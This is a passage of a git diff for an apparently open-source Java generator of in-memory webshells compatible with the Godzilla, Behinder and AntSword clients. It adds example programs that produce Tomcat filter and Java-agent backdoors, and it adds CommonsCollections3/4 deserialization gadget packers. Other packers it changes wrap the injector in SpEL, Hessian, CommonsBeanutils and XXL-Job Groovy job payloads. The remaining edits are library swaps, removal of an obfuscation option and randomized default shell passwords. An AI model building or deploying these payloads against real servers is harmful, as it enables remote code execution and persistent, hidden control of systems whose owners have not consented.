/dev/null +++ b/examples/memshell-party-maven-example/src/main/java/com/reajason/javaweb/Godzilla.java @@ -0,0 +1,50 @@ +package com.reajason.javaweb; + +import com.reajason.javaweb.memshell.*; +import com.reajason.javaweb.memshell.config.GenerateResult; +import com.reajason.javaweb.memshell.config.GodzillaConfig; +import com.reajason.javaweb.memshell.config.InjectorConfig; +import com.reajason.javaweb.memshell.config.ShellConfig; + +/** + * @author ReaJason + * @since 2025/4/6 + */ +public class Godzilla { + public static void main(String[] args) { + ShellConfig shellConfig = ShellConfig.builder() + .server(Server.Tomcat) + .shellTool(ShellTool.Godzilla) + .shellType(ShellType.FILTER) + .shrink(true) // 缩小字节码 + .debug(false) // 关闭调试 + .build(); + + InjectorConfig injectorConfig = InjectorConfig.builder() +// .urlPattern("/*") // 自定义 urlPattern,默认就是 /* +// .shellClassName("com.example.memshell.GodzillaShell") // 自定义内存马类名,默认为空时随机生成 +// .injectorClassName("com.example.memshell.GodzillaInjector") // 自定义注入器类名,默认为空时随机生成 + .build(); + + GodzillaConfig godzillaConfig = GodzillaConfig.builder() +// .pass("pass") +// .key("key") +// .headerName("User-Agent") +// .headerValue("test") + .build(); + + GenerateResult result = MemShellGenerator.generate(shellConfig, injectorConfig, godzillaConfig); + + System.out.println("注入器类名:" + result.getInjectorClassName()); + System.out.println("内存马类名:" + result.getShellClassName()); + + System.out.println(result.getShellConfig()); + System.out.println(result.getShellToolConfig()); + + System.out.println("Base64 打包:" + Packers.Base64.getInstance().pack(result)); + + System.out.println("脚本引擎打包:" + Packers.ScriptEngine.getInstance().pack(result)); + + System.out.println("CC3 打包:" + Packers.JavaCommonsCollections3.getInstance().pack(result)); + } +} diff --git a/examples/memshell-party-maven-example/src/main/java/com/reajason/javaweb/GodzillaAgent.java b/examples/memshell-party-maven-example/src/main/java/com/reajason/javaweb/GodzillaAgent.java new file mode 100644 index 00000000..73472a33 --- /dev/null +++ b/examples/memshell-party-maven-example/src/main/java/com/reajason/javaweb/GodzillaAgent.java @@ -0,0 +1,52 @@ +package com.reajason.javaweb; + +import com.reajason.javaweb.memshell.*; +import com.reajason.javaweb.memshell.config.GenerateResult; +import com.reajason.javaweb.memshell.config.GodzillaConfig; +import com.reajason.javaweb.memshell.config.InjectorConfig; +import com.reajason.javaweb.memshell.config.ShellConfig; +import com.reajason.javaweb.memshell.packer.jar.JarPacker; + +import java.nio.file.Files; +import java.nio.file.Paths; + +/** + * @author ReaJason + * @since 2025/4/6 + */ +public class GodzillaAgent { + + public static void main(String[] args) throws Exception { + ShellConfig shellConfig = ShellConfig.builder() + .server(Server.Tomcat) + .shellTool(ShellTool.Godzilla) + .shellType(ShellType.AGENT_FILTER_CHAIN) + .shrink(true) // 缩小字节码 + .debug(false) // 关闭调试 + .build(); + + InjectorConfig injectorConfig = InjectorConfig.builder() +// .urlPattern("/*") // 自定义 urlPattern,默认就是 /* +// .shellClassName("com.example.memshell.GodzillaShell") // 自定义内存马类名,默认为空时随机生成 +// .injectorClassName("com.example.memshell.GodzillaInjector") // 自定义注入器类名,默认为空时随机生成 + .build(); + + GodzillaConfig godzillaConfig = GodzillaConfig.builder() +// .pass("pass") +// .key("key") +// .headerName("User-Agent") +// .headerValue("test") + .build(); + + GenerateResult result = MemShellGenerator.generate(shellConfig, injectorConfig, godzillaConfig); + + System.out.println("注入器类名:" + result.getInjectorClassName()); + System.out.println("内存马类名:" + result.getShellClassName()); + + System.out.println(result.getShellConfig()); + System.out.println(result.getShellToolConfig()); + + byte[] agentJarBytes = ((JarPacker) Packers.AgentJar.getInstance()).packBytes(result); + Files.write(Paths.get("agent.jar"), agentJarBytes); + } +} diff --git a/generator/build.gradle b/generator/build.gradle index bc13edb5..fd4a580e 100644 --- a/generator/build.gradle +++ b/generator/build.gradle @@ -1,7 +1,3 @@ -plugins { - id "io.freefair.lombok" version "8.11" -} - java { toolchain { languageVersion = JavaLanguageVersion.of(8) @@ -10,9 +6,11 @@ java { targetCompatibility = JavaVersion.VERSION_1_8 } -group = 'com.reajason.javaweb.memsell' +group = 'io.github.reajason' +description = "MemShell Generator for Java" version = rootProject.version +// 测试使用 JDK17 进行编译与运行 tasks.withType(Test).configureEach { javaLauncher = javaToolchains.launcherFor { languageVersion = JavaLanguageVersion.of(17) @@ -33,26 +31,24 @@ test { } dependencies { - implementation project(":common") + implementation project(":memshell-party-common") implementation project(":deserialize") + implementation project(":memshell") implementation project(":memshell-java8") implementation 'net.bytebuddy:byte-buddy' implementation 'org.ow2.asm:asm-commons' - implementation 'com.github.jar-analyzer:class-obf' implementation 'javax.servlet:javax.servlet-api' implementation 'javax.websocket:javax.websocket-api' - implementation 'jakarta.servlet:jakarta.servlet-api' implementation 'org.apache.bcel:bcel' implementation 'commons-io:commons-io' implementation 'org.apache.commons:commons-lang3' - implementation 'commons-codec:commons-codec' implementation 'com.squareup.okhttp3:okhttp' implementation 'ch.qos.logback:logback-classic' - implementation 'com.alibaba.fastjson2:fastjson2' + implementation 'com.fasterxml.jackson.core:jackson-databind' implementation 'org.springframework:spring-webmvc' implementation 'org.springframework:spring-webflux' diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java index 872d1ddc..9f70e85c 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java @@ -4,8 +4,6 @@ import com.reajason.javaweb.memshell.generator.*; import com.reajason.javaweb.memshell.server.AbstractShell; import com.reajason.javaweb.memshell.utils.CommonUtil; -import me.n1ar4.clazz.obfuscator.api.ClassObf; -import me.n1ar4.clazz.obfuscator.config.BaseConfig; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.tuple.Pair; @@ -48,39 +46,12 @@ public static GenerateResult generate(ShellConfig shellConfig, InjectorConfig in byte[] shellBytes = generateShellBytes(shellConfig, shellToolConfig); - if (shellConfig.isObfuscate()) { - BaseConfig config = BaseConfig.Default(); - config.setIgnorePublic(true); - config.setEnableMethodName(false); - config.setEnableFieldName(false); - config.setEnableAES(false); - config.setEnableAdvanceString(false); - config.setQuiet(true); - - ClassObf classObf = new ClassObf(config); - shellBytes = classObf.run(shellBytes).getData(); - } - injectorConfig.setInjectorClass(injectorClass); injectorConfig.setShellClassName(shellToolConfig.getShellClassName()); injectorConfig.setShellClassBytes(shellBytes); InjectorGenerator injectorGenerator = new InjectorGenerator(shellConfig, injectorConfig); byte[] injectorBytes = injectorGenerator.generate(); - - if (shellConfig.isObfuscate()) { - BaseConfig config = BaseConfig.Default(); - config.setIgnorePublic(true); - config.setEnableMethodName(false); - config.setEnableFieldName(false); - config.setEnableAES(false); - config.setEnableAdvanceString(false); - config.setQuiet(true); - - ClassObf classObf = new ClassObf(config); - injectorBytes = classObf.run(injectorBytes).getData(); - } - Map innerClassBytes = injectorGenerator.getInnerClassBytes(); return GenerateResult.builder() diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/Packers.java b/generator/src/main/java/com/reajason/javaweb/memshell/Packers.java index 2c68dd9c..c48bed14 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/Packers.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/Packers.java @@ -103,6 +103,8 @@ public enum Packers { JavaCommonsBeanutils17(new CommonsBeanutils18Packer(), JavaDeserializePacker.class), JavaCommonsBeanutils16(new CommonsBeanutils16Packer(), JavaDeserializePacker.class), JavaCommonsBeanutils110(new CommonsBeanutils110Packer(), JavaDeserializePacker.class), + JavaCommonsCollections3(new CommonsCollections3Packer(), JavaDeserializePacker.class), + JavaCommonsCollections4(new CommonsCollections4Packer(), JavaDeserializePacker.class), /** * Hessian 反序列化打包器 diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/config/AntSwordConfig.java b/generator/src/main/java/com/reajason/javaweb/memshell/config/AntSwordConfig.java index 569bdc55..c9c325c6 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/config/AntSwordConfig.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/config/AntSwordConfig.java @@ -15,7 +15,7 @@ @ToString public class AntSwordConfig extends ShellToolConfig { @Builder.Default - private String pass = "pass"; + private String pass = CommonUtil.getRandomString(8); @Builder.Default private String headerName = "User-Agent"; @Builder.Default diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/config/BehinderConfig.java b/generator/src/main/java/com/reajason/javaweb/memshell/config/BehinderConfig.java index 10cf9d64..29a4bc40 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/config/BehinderConfig.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/config/BehinderConfig.java @@ -15,7 +15,7 @@ @ToString public class BehinderConfig extends ShellToolConfig { @Builder.Default - private String pass = "pass"; + private String pass = CommonUtil.getRandomString(8); @Builder.Default private String headerName = "User-Agent"; @Builder.Default diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java b/generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java index d9ad38b8..85907532 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java @@ -1,5 +1,6 @@ package com.reajason.javaweb.memshell.config; +import com.reajason.javaweb.memshell.utils.CommonUtil; import lombok.Builder; import lombok.Getter; import lombok.ToString; @@ -14,5 +15,5 @@ @ToString public class CommandConfig extends ShellToolConfig { @Builder.Default - private String paramName = "cmd"; + private String paramName = CommonUtil.getRandomString(8); } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/config/GenerateResult.java b/generator/src/main/java/com/reajason/javaweb/memshell/config/GenerateResult.java index e44d5c2a..812659dc 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/config/GenerateResult.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/config/GenerateResult.java @@ -4,8 +4,8 @@ import lombok.Builder; import lombok.Data; import lombok.NoArgsConstructor; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64; import java.util.Map; /** @@ -33,11 +33,11 @@ public class GenerateResult { public static class GenerateResultBuilder { public GenerateResult build() { if (shellBytes != null) { - shellBytesBase64Str = Base64.encodeBase64String(shellBytes); + shellBytesBase64Str = Base64.getEncoder().encodeToString(shellBytes); shellSize = shellBytes.length; } if (injectorBytes != null) { - injectorBytesBase64Str = Base64.encodeBase64String(injectorBytes); + injectorBytesBase64Str = Base64.getEncoder().encodeToString(injectorBytes); injectorSize = injectorBytes.length; } return new GenerateResult(shellClassName, shellBytes, shellSize, shellBytesBase64Str, diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/config/GodzillaConfig.java b/generator/src/main/java/com/reajason/javaweb/memshell/config/GodzillaConfig.java index 67956665..98f40640 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/config/GodzillaConfig.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/config/GodzillaConfig.java @@ -15,9 +15,9 @@ @ToString public class GodzillaConfig extends ShellToolConfig { @Builder.Default - private String pass = "pass"; + private String pass = CommonUtil.getRandomString(8); @Builder.Default - private String key = "key"; + private String key = CommonUtil.getRandomString(8); @Builder.Default private String headerName = "User-Agent"; @Builder.Default diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/config/ShellConfig.java b/generator/src/main/java/com/reajason/javaweb/memshell/config/ShellConfig.java index 4ad78f3f..c2e4948e 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/config/ShellConfig.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/config/ShellConfig.java @@ -45,12 +45,6 @@ public class ShellConfig { @Builder.Default private boolean byPassJavaModule = false; - /** - * 是否开启混淆 - */ - @Builder.Default - private boolean obfuscate = false; - /** * 是否开启调试 */ diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/generator/BehinderGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/generator/BehinderGenerator.java index 2928ec50..45fdd563 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/generator/BehinderGenerator.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/generator/BehinderGenerator.java @@ -8,9 +8,9 @@ import com.reajason.javaweb.memshell.ShellType; import com.reajason.javaweb.memshell.config.BehinderConfig; import com.reajason.javaweb.memshell.config.ShellConfig; +import com.reajason.javaweb.memshell.utils.DigestUtils; import net.bytebuddy.ByteBuddy; import net.bytebuddy.dynamic.DynamicType; -import org.apache.commons.codec.digest.DigestUtils; import org.apache.commons.lang3.StringUtils; import java.util.HashMap; diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/generator/CustomShellGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/generator/CustomShellGenerator.java index 20611f9f..38d242a1 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/generator/CustomShellGenerator.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/generator/CustomShellGenerator.java @@ -4,9 +4,10 @@ import com.reajason.javaweb.asm.ClassRenameUtils; import com.reajason.javaweb.memshell.config.CustomConfig; import com.reajason.javaweb.memshell.config.ShellConfig; -import org.apache.commons.codec.binary.Base64; import org.apache.commons.lang3.StringUtils; +import java.util.Base64; + /** * @author ReaJason * @since 2025/3/18 @@ -28,7 +29,7 @@ public byte[] getBytes() { throw new IllegalArgumentException("Custom shell class is empty"); } - byte[] bytes = ClassRenameUtils.renameClass(Base64.decodeBase64(shellClassBase64), customConfig.getShellClassName()); + byte[] bytes = ClassRenameUtils.renameClass(Base64.getDecoder().decode(shellClassBase64), customConfig.getShellClassName()); return ClassBytesShrink.shrink(bytes, shellConfig.isShrink()); } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/generator/GodzillaGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/generator/GodzillaGenerator.java index 32adeee8..52fa95f7 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/generator/GodzillaGenerator.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/generator/GodzillaGenerator.java @@ -8,9 +8,9 @@ import com.reajason.javaweb.memshell.ShellType; import com.reajason.javaweb.memshell.config.GodzillaConfig; import com.reajason.javaweb.memshell.config.ShellConfig; +import com.reajason.javaweb.memshell.utils.DigestUtils; import net.bytebuddy.ByteBuddy; import net.bytebuddy.dynamic.DynamicType; -import org.apache.commons.codec.digest.DigestUtils; import org.apache.commons.lang3.StringUtils; import java.util.HashMap; diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java index a83ddf53..815281b6 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java @@ -14,7 +14,7 @@ import net.bytebuddy.dynamic.scaffold.TypeValidation; import net.bytebuddy.implementation.FixedValue; import net.bytebuddy.pool.TypePool; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; import java.util.*; @@ -35,7 +35,7 @@ public InjectorGenerator(ShellConfig shellConfig, InjectorConfig injectorConfig) @SneakyThrows public DynamicType.Builder getBuilder() { - String base64String = Base64.encodeBase64String(CommonUtil.gzipCompress(injectorConfig.getShellClassBytes())); + String base64String = Base64.getEncoder().encodeToString(CommonUtil.gzipCompress(injectorConfig.getShellClassBytes())); String originalClassName = injectorConfig.getInjectorClass().getName(); String newClassName = injectorConfig.getInjectorClassName(); diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/XxlJobPacker.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/XxlJobPacker.java index 2f13853e..4480022a 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/XxlJobPacker.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/XxlJobPacker.java @@ -1,12 +1,15 @@ package com.reajason.javaweb.memshell.packer; -import com.alibaba.fastjson2.JSONObject; -import com.alibaba.fastjson2.JSONWriter; +import com.fasterxml.jackson.databind.ObjectMapper; +import com.fasterxml.jackson.databind.SerializationFeature; import com.reajason.javaweb.memshell.config.GenerateResult; +import lombok.SneakyThrows; import org.apache.commons.io.IOUtils; import java.io.IOException; import java.nio.charset.Charset; +import java.util.HashMap; +import java.util.Map; import java.util.Objects; /** @@ -25,23 +28,26 @@ public XxlJobPacker() { } @Override + @SneakyThrows public String pack(GenerateResult generateResult) { String source = template .replace("{{base64Str}}", generateResult.getInjectorBytesBase64Str()) .replace("{{className}}", generateResult.getInjectorClassName()); - JSONObject jsonObject = new JSONObject(); - jsonObject.put("jobId", 1); - jsonObject.put("executorHandler", "demoJobHandler"); - jsonObject.put("executorParams", "demoJobHandler"); - jsonObject.put("executorBlockStrategy", "COVER_EARLY"); - jsonObject.put("executorTimeout", 0); - jsonObject.put("logId", 1); - jsonObject.put("logDateTime", System.currentTimeMillis()); - jsonObject.put("glueType", "GLUE_GROOVY"); - jsonObject.put("glueSource", source); - jsonObject.put("glueUpdatetime", System.currentTimeMillis()); - jsonObject.put("broadcastIndex", 0); - jsonObject.put("broadcastTotal", 0); - return JSONObject.toJSONString(jsonObject, JSONWriter.Feature.PrettyFormat); + Map map = new HashMap<>(); + map.put("jobId", 1); + map.put("executorHandler", "demoJobHandler"); + map.put("executorParams", "demoJobHandler"); + map.put("executorBlockStrategy", "COVER_EARLY"); + map.put("executorTimeout", 0); + map.put("logId", 1); + map.put("logDateTime", System.currentTimeMillis()); + map.put("glueType", "GLUE_GROOVY"); + map.put("glueSource", source); + map.put("glueUpdatetime", System.currentTimeMillis()); + map.put("broadcastIndex", 0); + map.put("broadcastTotal", 0); + ObjectMapper objectMapper = new ObjectMapper(); + objectMapper.enable(SerializationFeature.INDENT_OUTPUT); // 美化输出 + return objectMapper.writeValueAsString(map); } } \ No newline at end of file diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/base64/DefaultBase64Packer.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/base64/DefaultBase64Packer.java index 8e50a99f..5e9787cf 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/base64/DefaultBase64Packer.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/base64/DefaultBase64Packer.java @@ -2,7 +2,7 @@ import com.reajason.javaweb.memshell.config.GenerateResult; import com.reajason.javaweb.memshell.packer.Packer; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; /** * @author ReaJason @@ -11,6 +11,6 @@ public class DefaultBase64Packer implements Packer { @Override public String pack(GenerateResult generateResult) { - return Base64.encodeBase64String(generateResult.getInjectorBytes()); + return Base64.getEncoder().encodeToString(generateResult.getInjectorBytes()); } } \ No newline at end of file diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/base64/GzipBase64Packer.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/base64/GzipBase64Packer.java index d9e82722..0f2dbc6a 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/base64/GzipBase64Packer.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/base64/GzipBase64Packer.java @@ -4,7 +4,7 @@ import com.reajason.javaweb.memshell.packer.Packer; import com.reajason.javaweb.memshell.utils.CommonUtil; import lombok.SneakyThrows; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; /** * @author ReaJason @@ -14,6 +14,6 @@ public class GzipBase64Packer implements Packer { @Override @SneakyThrows public String pack(GenerateResult generateResult) { - return Base64.encodeBase64String(CommonUtil.gzipCompress(generateResult.getInjectorBytes())); + return Base64.getEncoder().encodeToString(CommonUtil.gzipCompress(generateResult.getInjectorBytes())); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/hessian/Hessian2XSLTScriptEnginePacker.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/hessian/Hessian2XSLTScriptEnginePacker.java index eda03e86..b5a01725 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/hessian/Hessian2XSLTScriptEnginePacker.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/hessian/Hessian2XSLTScriptEnginePacker.java @@ -5,7 +5,8 @@ import com.reajason.javaweb.deserialize.PayloadType; import com.reajason.javaweb.memshell.config.GenerateResult; import com.reajason.javaweb.memshell.packer.Packer; -import org.apache.commons.codec.binary.Base64; + +import java.util.Base64; /** * @author ReaJason @@ -19,6 +20,6 @@ public String pack(GenerateResult generateResult) { DeserializeConfig deserializeConfig = new DeserializeConfig(); deserializeConfig.setPayloadType(PayloadType.XSLTScriptEngine); byte[] generate = Hessian2DeserializeGenerator.generate(injectorBytes, injectorClassName, deserializeConfig); - return Base64.encodeBase64String(generate); + return Base64.getEncoder().encodeToString(generate); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/hessian/HessianXSLTScriptEnginePacker.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/hessian/HessianXSLTScriptEnginePacker.java index 9a2b1d65..206bc6aa 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/hessian/HessianXSLTScriptEnginePacker.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/hessian/HessianXSLTScriptEnginePacker.java @@ -5,7 +5,7 @@ import com.reajason.javaweb.deserialize.PayloadType; import com.reajason.javaweb.memshell.config.GenerateResult; import com.reajason.javaweb.memshell.packer.Packer; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; /** * @author ReaJason @@ -19,6 +19,6 @@ public String pack(GenerateResult generateResult) { DeserializeConfig deserializeConfig = new DeserializeConfig(); deserializeConfig.setPayloadType(PayloadType.XSLTScriptEngine); byte[] generate = HessianDeserializeGenerator.generate(injectorBytes, injectorClassName, deserializeConfig); - return Base64.encodeBase64String(generate); + return Base64.getEncoder().encodeToString(generate); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils110Packer.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils110Packer.java index 8739b485..04f5454f 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils110Packer.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils110Packer.java @@ -6,7 +6,7 @@ import com.reajason.javaweb.memshell.config.GenerateResult; import com.reajason.javaweb.memshell.packer.Packer; import lombok.SneakyThrows; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; /** * @author ReaJason @@ -19,6 +19,6 @@ public class CommonsBeanutils110Packer implements Packer { public String pack(GenerateResult generateResult) { DeserializeConfig deserializeConfig = new DeserializeConfig(); deserializeConfig.setPayloadType(PayloadType.CommonsBeanutils110); - return Base64.encodeBase64String(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); + return Base64.getEncoder().encodeToString(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils16Packer.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils16Packer.java index 31cf6043..f1002a1f 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils16Packer.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils16Packer.java @@ -6,7 +6,7 @@ import com.reajason.javaweb.memshell.config.GenerateResult; import com.reajason.javaweb.memshell.packer.Packer; import lombok.SneakyThrows; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; /** * @author ReaJason @@ -19,6 +19,6 @@ public class CommonsBeanutils16Packer implements Packer { public String pack(GenerateResult generateResult) { DeserializeConfig deserializeConfig = new DeserializeConfig(); deserializeConfig.setPayloadType(PayloadType.CommonsBeanutils16); - return Base64.encodeBase64String(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); + return Base64.getEncoder().encodeToString(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils18Packer.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils18Packer.java index e14e8069..2d34563a 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils18Packer.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils18Packer.java @@ -6,7 +6,7 @@ import com.reajason.javaweb.memshell.config.GenerateResult; import com.reajason.javaweb.memshell.packer.Packer; import lombok.SneakyThrows; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; /** * @author ReaJason @@ -19,6 +19,6 @@ public class CommonsBeanutils18Packer implements Packer { public String pack(GenerateResult generateResult) { DeserializeConfig deserializeConfig = new DeserializeConfig(); deserializeConfig.setPayloadType(PayloadType.CommonsBeanutils18); - return Base64.encodeBase64String(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); + return Base64.getEncoder().encodeToString(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils19Packer.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils19Packer.java index cbb6f7e0..08a958f0 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils19Packer.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsBeanutils19Packer.java @@ -6,7 +6,8 @@ import com.reajason.javaweb.memshell.config.GenerateResult; import com.reajason.javaweb.memshell.packer.Packer; import lombok.SneakyThrows; -import org.apache.commons.codec.binary.Base64; + +import java.util.Base64; /** * @author ReaJason @@ -19,6 +20,6 @@ public class CommonsBeanutils19Packer implements Packer { public String pack(GenerateResult generateResult) { DeserializeConfig deserializeConfig = new DeserializeConfig(); deserializeConfig.setPayloadType(PayloadType.CommonsBeanutils19); - return Base64.encodeBase64String(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); + return Base64.getEncoder().encodeToString(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsCollections3Packer.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsCollections3Packer.java new file mode 100644 index 00000000..21266dd5 --- /dev/null +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsCollections3Packer.java @@ -0,0 +1,24 @@ +package com.reajason.javaweb.memshell.packer.deserialize.java; + +import com.reajason.javaweb.deserialize.DeserializeConfig; +import com.reajason.javaweb.deserialize.JavaDeserializeGenerator; +import com.reajason.javaweb.deserialize.PayloadType; +import com.reajason.javaweb.memshell.config.GenerateResult; +import com.reajason.javaweb.memshell.packer.Packer; +import lombok.SneakyThrows; +import java.util.Base64;; + +/** + * @author ReaJason + * @since 2025/2/17 + */ +public class CommonsCollections3Packer implements Packer { + + @Override + @SneakyThrows + public String pack(GenerateResult generateResult) { + DeserializeConfig deserializeConfig = new DeserializeConfig(); + deserializeConfig.setPayloadType(PayloadType.CommonsCollections3); + return Base64.getEncoder().encodeToString(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); + } +} diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsCollections4Packer.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsCollections4Packer.java new file mode 100644 index 00000000..71a0aa21 --- /dev/null +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsCollections4Packer.java @@ -0,0 +1,24 @@ +package com.reajason.javaweb.memshell.packer.deserialize.java; + +import com.reajason.javaweb.deserialize.DeserializeConfig; +import com.reajason.javaweb.deserialize.JavaDeserializeGenerator; +import com.reajason.javaweb.deserialize.PayloadType; +import com.reajason.javaweb.memshell.config.GenerateResult; +import com.reajason.javaweb.memshell.packer.Packer; +import lombok.SneakyThrows; +import java.util.Base64;; + +/** + * @author ReaJason + * @since 2025/2/17 + */ +public class CommonsCollections4Packer implements Packer { + + @Override + @SneakyThrows + public String pack(GenerateResult generateResult) { + DeserializeConfig deserializeConfig = new DeserializeConfig(); + deserializeConfig.setPayloadType(PayloadType.CommonsCollections4); + return Base64.getEncoder().encodeToString(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig)); + } +} diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/packer/spel/SpELSpringIOUtilsGzipPacker.java b/generator/src/main/java/com/reajason/javaweb/memshell/packer/spel/SpELSpringIOUtilsGzipPacker.java index 315d26be..e4aef5fc 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/packer/spel/SpELSpringIOUtilsGzipPacker.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/packer/spel/SpELSpringIOUtilsGzipPacker.java @@ -4,7 +4,7 @@ import com.reajason.javaweb.memshell.packer.Packer; import com.reajason.javaweb.memshell.utils.CommonUtil; import lombok.SneakyThrows; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; /** * @author ReaJason @@ -17,6 +17,6 @@ public class SpELSpringIOUtilsGzipPacker implements Packer { @SneakyThrows public String pack(GenerateResult generateResult) { return template.replace("{{className}}", generateResult.getInjectorClassName()) - .replace("{{base64Str}}", Base64.encodeBase64String(CommonUtil.gzipCompress(generateResult.getInjectorBytes()))); + 